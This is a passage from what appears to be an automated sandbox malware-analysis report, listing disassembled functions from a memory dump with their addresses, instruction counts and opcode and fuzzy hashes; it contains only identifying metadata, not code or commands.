                              Function 00007FFD9BAD2EC0 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: Xc"q
                              • API String ID: 0-3856435874
                              • Opcode ID: 283e38ebb9567805983f8106d3a5f2a866df5a09afcef00222f8177e49494ec9
                              • Instruction ID: 729a5e3b547ce9cedf8fcabb4923a508726be3e1b827e6a0a485e2701ce1052b
                              • Opcode Fuzzy Hash: 283e38ebb9567805983f8106d3a5f2a866df5a09afcef00222f8177e49494ec9
                              • Instruction Fuzzy Hash: E9018860B2C7454BD308AB6C986666DB7D1EF9D705F50057DF44EC32E7CE28A8428587
                              Function 00007FFD9BAE8157 Relevance: 1.3, Strings: 1, Instructions: 15COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID: ,
                              • API String ID: 0-1222783184
                              • Opcode ID: 4fa9ab26f7d8403dc64df7aef4cf89e4518c5e9dd04d7c0cfa6253fd203edeb6
                              • Instruction ID: 81585d21260f07f9e01e3ca55f15bcb63dc2b67e7a7a1ba4df1b3077ed3f72aa
                              • Opcode Fuzzy Hash: 4fa9ab26f7d8403dc64df7aef4cf89e4518c5e9dd04d7c0cfa6253fd203edeb6
                              • Instruction Fuzzy Hash: 0EC08C53A8984E8BE764569DB4520E6B380EBB4220F860172F09A8A185DCD96EC3A385
                              Function 00007FFD9BADFA55 Relevance: 1.2, Instructions: 1183COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b023398100eb3b77e13074ae273294c7ef942b1ff2ff2a8e84abc70fb1cae1c8
                              • Instruction ID: 2e3b8056a8e3afedeecf8169df502f7f5d3cdda3bd123c984d2e1213e8a9476c
                              • Opcode Fuzzy Hash: b023398100eb3b77e13074ae273294c7ef942b1ff2ff2a8e84abc70fb1cae1c8
                              • Instruction Fuzzy Hash: BD922B3160E6899FD362DBB448B65E97FF0EF46320B5901EDD48ACB1A3DA6E1C06C711
                              Function 00007FFD9BAE9076 Relevance: .8, Instructions: 849COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 774a117288be66c9a93964619f2092e333272da2d4c9e72ba60d2b91ace2ee50
                              • Instruction ID: d0c75aa6cefcb99e1a296a7e97d844eae7e2959dc9a56ac09d9b0e9f41120f73
                              • Opcode Fuzzy Hash: 774a117288be66c9a93964619f2092e333272da2d4c9e72ba60d2b91ace2ee50
                              • Instruction Fuzzy Hash: 04321832B0DA8D4FE7699B6858752A837D2FF99314B0502BEE05DC32E7DD257C428781
                              Function 00007FFD9BAF31A0 Relevance: .6, Instructions: 618COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 672b993b54213e114873b33f68ea9bac71218df3129cc6f4eb0db548cc69e704
                              • Instruction ID: 79c484700b8475182d53b4f5a170ada097da05c76c59c3a83e8223c64a79d680
                              • Opcode Fuzzy Hash: 672b993b54213e114873b33f68ea9bac71218df3129cc6f4eb0db548cc69e704
                              • Instruction Fuzzy Hash: BC124430A0EB4A4FE728DF28C4655B1B3E0FF55318B1546BED09AC76E2DA25F942C781
                              Function 00007FFD9BB24538 Relevance: .6, Instructions: 572COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 18eb8e040941d9fcbff0b1c122019710f3920d0bd85eb796facaa1446b5fb0ca
                              • Instruction ID: e4ec0cec70679e7893e14f579d41d2ee01a5468196d78a189e449e47168f3bd9
                              • Opcode Fuzzy Hash: 18eb8e040941d9fcbff0b1c122019710f3920d0bd85eb796facaa1446b5fb0ca
                              • Instruction Fuzzy Hash: 6602E43170DA494FDB98DB18C861A65B7E2FFA9304B1542ADD05ECB2E6DE24FC42C741
                              Function 00007FFD9BAE7C9E Relevance: .4, Instructions: 372COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ef2953575d758207a46b1fd410283cf50ddc6ce302c78e3e0b5b6c43ccf934a8
                              • Instruction ID: 1fd3f7d9c5273ca5cd1621786a4137cfc8689f629d2f61ad776080b72a51a2ef
                              • Opcode Fuzzy Hash: ef2953575d758207a46b1fd410283cf50ddc6ce302c78e3e0b5b6c43ccf934a8
                              • Instruction Fuzzy Hash: E5D15030709A4E8FDBD8EF18C4A4AA977E2FF98314B5045A9D41EC7296CB35EC52CB40
                              Function 00007FFD9BAE3617 Relevance: .4, Instructions: 355COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1a733278732bcb44f5647044d61ceb564fbc74b7ed28169fde9d0d19239c5d68
                              • Instruction ID: d8a0ed6cca127ea72021df21b7282063ac3487d8769275f6e771147a51923b63
                              • Opcode Fuzzy Hash: 1a733278732bcb44f5647044d61ceb564fbc74b7ed28169fde9d0d19239c5d68
                              • Instruction Fuzzy Hash: 76C13330715A4E8FDBD9EF18C4A4AA973E2FF98314B5045A9D41EC7296CB35EC52CB40
                              Function 00007FFD9BB24588 Relevance: .3, Instructions: 345COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c50e5c05edec4708cd6d7f4d78a2bf4c41bb2b7c5c03c689f562a21038333e9
                              • Instruction ID: 89da6b07d90289b1c8f85262a04b2e3fc181dc2d8526d5b1c53660d0e5e07f66
                              • Opcode Fuzzy Hash: 8c50e5c05edec4708cd6d7f4d78a2bf4c41bb2b7c5c03c689f562a21038333e9
                              • Instruction Fuzzy Hash: A2C19130A19A0E8FEBA8DA58C4A077573D1FF64308F654579C46E876D6CA39FD81CB80
                              Function 00007FFD9BAEA2C8 Relevance: .3, Instructions: 342COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7bd09dbae026df7ccaae25a180f88fd49a6a4eba16bf1b08d7a135b7d6fc680a
                              • Instruction ID: b4f91ced8edb6e8ec165e9304c7fae7b28f69e56acdc778323633f7a1a4b1f34
                              • Opcode Fuzzy Hash: 7bd09dbae026df7ccaae25a180f88fd49a6a4eba16bf1b08d7a135b7d6fc680a
                              • Instruction Fuzzy Hash: 15B19370B1994D8FDF94EF6CC8A8EA977E1FF68354B0501A9E09DD72A5DA24EC01CB00
                              Function 00007FFD9BAED435 Relevance: .3, Instructions: 334COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a62c3d6420a09fa1f0f9724be1dad26fcec51a05513e00e8a0a76752b236e54b
                              • Instruction ID: d2369e7bb60a8d72987939077f333dfbdccb4e22140acd305974716320b22347
                              • Opcode Fuzzy Hash: a62c3d6420a09fa1f0f9724be1dad26fcec51a05513e00e8a0a76752b236e54b
                              • Instruction Fuzzy Hash: E6A11831A0E6CE4FE76297B448751E57FE0EF46310F0A01FAD49CCB0A3EA6D191A8752
                              Function 00007FFD9BB01610 Relevance: .3, Instructions: 319COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d363526fde3da22cd034702c75a3060f241cc62a165535238a3fa3314f18dfdc
                              • Instruction ID: e913f5c685c764f536640b19fb44f725d04f74881c91f62a2b924c7bc5efb15c
                              • Opcode Fuzzy Hash: d363526fde3da22cd034702c75a3060f241cc62a165535238a3fa3314f18dfdc
                              • Instruction Fuzzy Hash: 8791AD3071994D4FEBE4EF2C98A8B6877D2FF9831474641FAE44EC72A6DE25AC418740
                              Function 00007FFD9BAEC974 Relevance: .3, Instructions: 313COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 34dab4631272da16af5dc1067d2bc3605aa2f8b06b800e1888016e1f6e03083e
                              • Instruction ID: c9a0262a40314e0032661260e110b11e5292102a29f98a0da4e3ca4b82793b81
                              • Opcode Fuzzy Hash: 34dab4631272da16af5dc1067d2bc3605aa2f8b06b800e1888016e1f6e03083e
                              • Instruction Fuzzy Hash: 23A16071718E498FDB9CEB18C491DA973E2FFA831471042ADE05AC76A6DE35F842CB41
                              Function 00007FFD9BADD826 Relevance: .3, Instructions: 309COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9080142fc85d728be56e857937fb0e08099978ebac203ed6d3e0dde3fb5a2296
                              • Instruction ID: bf57387aa9753ae0ba792a16d570cf2febc93965ddff5fa56e7d691d28f42906
                              • Opcode Fuzzy Hash: 9080142fc85d728be56e857937fb0e08099978ebac203ed6d3e0dde3fb5a2296
                              • Instruction Fuzzy Hash: C2C1BF74604A4E8FEBC5EF18C49C7A937E1FB68305F24457E982DCB295DB329992CB00
                              Function 00007FFD9BAE7104 Relevance: .3, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3580a27ed473ccfc8261a9861ef3b134f86af733a77fd15fe4a59b7c6e42fd7b
                              • Instruction ID: a21500943dac41a5977daac145b0537b39fa3c2c5a255fef95d370d070b1d0c8
                              • Opcode Fuzzy Hash: 3580a27ed473ccfc8261a9861ef3b134f86af733a77fd15fe4a59b7c6e42fd7b
                              • Instruction Fuzzy Hash: 80911A31A0E7CA0FE762977458695E57FE0EF46320F0A01FBD488CB0A3DA5D5E1A8752
                              Function 00007FFD9BAD10A5 Relevance: .3, Instructions: 298COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c36377f6c8db3b144c3cbf61fc1c47f9b0405a4eca430b5d9f4d2ce5b0984523
                              • Instruction ID: 1ab25a13446281423a4a59670042df5104f576d8577a8e270e2f6340ca286a70
                              • Opcode Fuzzy Hash: c36377f6c8db3b144c3cbf61fc1c47f9b0405a4eca430b5d9f4d2ce5b0984523
                              • Instruction Fuzzy Hash: 9EA10821B0E68A4FEB75DFA888712F93791FF91350F0506BAE49D871E7CDA9A901C341
                              Function 00007FFD9BADF1FA Relevance: .3, Instructions: 297COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 050cc19d7e332295e5456130d8d21ccd1fad344cc42841fae9fc24f436cb7c4e
                              • Instruction ID: 75a4d408c83b924500d4d640dd4190db520dd7efc8dbfb6abedb636aa7916667
                              • Opcode Fuzzy Hash: 050cc19d7e332295e5456130d8d21ccd1fad344cc42841fae9fc24f436cb7c4e
                              • Instruction Fuzzy Hash: 0E815D72A0E64A4FE711F7BCA8655E97BA0FF9133A70543FBD0598B0A3ED1958468380
                              Function 00007FFD9BADF785 Relevance: .3, Instructions: 286COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0ba1f8c1808697131b4a055841e12a531572a93c6ff75976efbc7136fd4f3f8d
                              • Instruction ID: 29a47f402d7956a37b9cde3f8f1e87fead496ea3c606e33319e81927de8ccab6
                              • Opcode Fuzzy Hash: 0ba1f8c1808697131b4a055841e12a531572a93c6ff75976efbc7136fd4f3f8d
                              • Instruction Fuzzy Hash: D5917D31B09A8D4FE7A4DF6488252EE77E0FF85310F0502BAD45DC71E1DA7AAA06C742
                              Function 00007FFD9BAF31B0 Relevance: .3, Instructions: 277COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aef07818bfc13aede9433dc4216e0c0ce8357ddc631e4e3090609cb4b770f1fd
                              • Instruction ID: c6386d3edf12f41e050efc4cf8867fa8abd0b33c347ab0c72a8ba1eb030c404a
                              • Opcode Fuzzy Hash: aef07818bfc13aede9433dc4216e0c0ce8357ddc631e4e3090609cb4b770f1fd
                              • Instruction Fuzzy Hash: 7981EF30A19B098FE768DF18C495975B3E1FF94308F114A7DD49AC36A2EE35F9428781
                              Function 00007FFD9BAEB150 Relevance: .3, Instructions: 275COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bcf977d502cd8796f34dc686c10fbfc60609b387dbc3f7159a70fb000261704b
                              • Instruction ID: daaade7da78e11a54971cf1de4aaca3912bea92a230f924acc55e01f51f545b3
                              • Opcode Fuzzy Hash: bcf977d502cd8796f34dc686c10fbfc60609b387dbc3f7159a70fb000261704b
                              • Instruction Fuzzy Hash: 8681E531A09A4E4FE7B9DA18C4997B1B3D1FBA9314F0541BAC45DC72E2DE34A882C781
                              Function 00007FFD9BB245A8 Relevance: .3, Instructions: 260COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4ef61f26dffaea955f7e72a5dd9eb6780252957eb173e9951040e6bade24cbe1
                              • Instruction ID: c46e4e504a941ec916a7b48356ac20fe159906101be392a61ab8ac07dbf0765d
                              • Opcode Fuzzy Hash: 4ef61f26dffaea955f7e72a5dd9eb6780252957eb173e9951040e6bade24cbe1
                              • Instruction Fuzzy Hash: 75818231719A0D8FDB68EB59C494E72B3E1FFA4314B24456DD05EC72A6CA25FC82C784
                              Function 00007FFD9BAE7DAC Relevance: .3, Instructions: 257COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 822924f9e753d6f4a07e66e3142293f43663d68a17d47c4c8cb80ef9a1486383
                              • Instruction ID: 28e6250c4b5eb23c980673bb1e6b3789dff815bf575620d57d5b0e6e1e47478a
                              • Opcode Fuzzy Hash: 822924f9e753d6f4a07e66e3142293f43663d68a17d47c4c8cb80ef9a1486383
                              • Instruction Fuzzy Hash: E6912130705A4E8FDB98EF18C4A4BA973E2FF98315B504569D41EC72A5CB75EC52CB40
                              Function 00007FFD9BB244E8 Relevance: .3, Instructions: 251COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 351e49d4c72999d1532f2ede7b44584825c5a83a6bd3d5737f4470658934a0e4
                              • Instruction ID: 85f2c3045134c4f01556febc98e65794bf33c75c7b55fa7b66c75c9280f66cb5
                              • Opcode Fuzzy Hash: 351e49d4c72999d1532f2ede7b44584825c5a83a6bd3d5737f4470658934a0e4
                              • Instruction Fuzzy Hash: 74710572A18F494FD7ACDA288455BB673D1FFA8364F04467ED09FC72A6DE34A8028740
                              Function 00007FFD9BAD7228 Relevance: .2, Instructions: 249COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2dbed2ea81c0b53aa95e8b7518ebd380e57662079c39cdfc7975e87b1533fbc4
                              • Instruction ID: 53a432e1a13d4a029555cf9f233e61b263ff4f54aa996c4840fe946a76df5e98
                              • Opcode Fuzzy Hash: 2dbed2ea81c0b53aa95e8b7518ebd380e57662079c39cdfc7975e87b1533fbc4
                              • Instruction Fuzzy Hash: 2D817131A0DA8D4FE771DB6488225EA7BE1FF95310F0502BAD45CD71E3DD68690ACB81
                              Function 00007FFD9BAEA275 Relevance: .2, Instructions: 246COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5b3365d77fea906c48290d1e43f8dc19cf598094fa76094c3f6eaa4499f7b4a2
                              • Instruction ID: d34b100323685a61c98e27c11e9e0da479445f86960c124cfe0815ad5ae0c0e2
                              • Opcode Fuzzy Hash: 5b3365d77fea906c48290d1e43f8dc19cf598094fa76094c3f6eaa4499f7b4a2
                              • Instruction Fuzzy Hash: 0E61ED3070DA0D8FDB98EB58D499B7973D1FF99354B1504BAE08ECB2B6DE25AC428740
                              Function 00007FFD9BAD7230 Relevance: .2, Instructions: 244COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb02e7eb762332d4eddd786757c2d45cda55ab2ab0f37ea7c7e80a8994dc123e
                              • Instruction ID: 1a0029de361e043b1b69805f5f1b51d90fb89ff5456fa582ee5c9aa1bb3dbb44
                              • Opcode Fuzzy Hash: bb02e7eb762332d4eddd786757c2d45cda55ab2ab0f37ea7c7e80a8994dc123e
                              • Instruction Fuzzy Hash: 9F716F32A0E69D0FE321A7749C311E9BBA0EF92325F0943BBD099C70E3D959550E8792
                              Function 00007FFD9BAEA720 Relevance: .2, Instructions: 240COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cac794a26c457b788eccec099b697a1c1f2594365ff7340e620be787518c0b0
                              • Instruction ID: c9cf5ed9bcfcef158ab38654b6809c1983902371db037d4e6bf2551a58b6177b
                              • Opcode Fuzzy Hash: 8cac794a26c457b788eccec099b697a1c1f2594365ff7340e620be787518c0b0
                              • Instruction Fuzzy Hash: 24712430B0EA5D4FD729EB6884619A97BE0FF55324B1601B9D04AC72F3CA29B842C791
                              Function 00007FFD9BAFF5B0 Relevance: .2, Instructions: 236COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2930b267ab83cd4a047ed94bafaa2cc88712e20f608fb91d3d32305d12230281
                              • Instruction ID: f2aae704abf4a63bbeae8c39beda73c828a2ddacd43e1aa92570e5022f9dee1d
                              • Opcode Fuzzy Hash: 2930b267ab83cd4a047ed94bafaa2cc88712e20f608fb91d3d32305d12230281
                              • Instruction Fuzzy Hash: 4771103071AB4A4FD728DB58C4909B5B7E1EF89304B1645BDD48BC76A2DE61FC42CB80
                              Function 00007FFD9BAE3809 Relevance: .2, Instructions: 235COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b5767f7e2c82e7534a29fa2c6e30fba21e50b684163ceef5a569cea0a717ea6a
                              • Instruction ID: 08a1db83de0eda40d6a0986bf01214131bae3b3c6ca972b9a3729ded1ce5c43c
                              • Opcode Fuzzy Hash: b5767f7e2c82e7534a29fa2c6e30fba21e50b684163ceef5a569cea0a717ea6a
                              • Instruction Fuzzy Hash: 11812B30709A0E8FDB99DF18C4A4AAA73E2FF98315F504569D41EC72A5CB75EC92CB40
                              Function 00007FFD9BAEA2F0 Relevance: .2, Instructions: 231COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 907ffa49c612dbd3fb77311b73fc690d028b707c6c441146d7a824888687a501
                              • Instruction ID: f355da91a73ac0a0c8773a2d4891d41a5d2628cb1c6006cfd65dc1a636fe08d1
                              • Opcode Fuzzy Hash: 907ffa49c612dbd3fb77311b73fc690d028b707c6c441146d7a824888687a501
                              • Instruction Fuzzy Hash: 0B613A3071990D8FDBA4EB6C8468B7977E1FF59304F0540B9E48ECB2AADE24AD45C741
                              Function 00007FFD9BAF31C8 Relevance: .2, Instructions: 230COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5833cfe148f13be02eb98fb8d2d40d500828946b96288c55a5fc93dabf6ec8e2
                              • Instruction ID: 763bb829cd9eab18dcb4c87c0d67b9c431a2b077c293f9e77b44b43c33e2ac10
                              • Opcode Fuzzy Hash: 5833cfe148f13be02eb98fb8d2d40d500828946b96288c55a5fc93dabf6ec8e2
                              • Instruction Fuzzy Hash: CF616932B1DB4E4FE368DEA884921B573D0FF52328B55167DD49AC35E2EE24B8438681
                              Function 00007FFD9BAE0885 Relevance: .2, Instructions: 230COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b331f639d59fef550404ef3d2f61d29b697b3197bb723e292caf42bf406e880b
                              • Instruction ID: 3f2892e5f3d569111603a29e3117823c9c2469d95d1797a6c32f620d271e6912
                              • Opcode Fuzzy Hash: b331f639d59fef550404ef3d2f61d29b697b3197bb723e292caf42bf406e880b
                              • Instruction Fuzzy Hash: 1E716931609E4E8FDB98EF2CC855AEE77E1FF58310B0446AAD459C719ADE34E852C780
                              Function 00007FFD9BAEADED Relevance: .2, Instructions: 227COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2374278467.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ffd9bad0000_obvious.jbxd
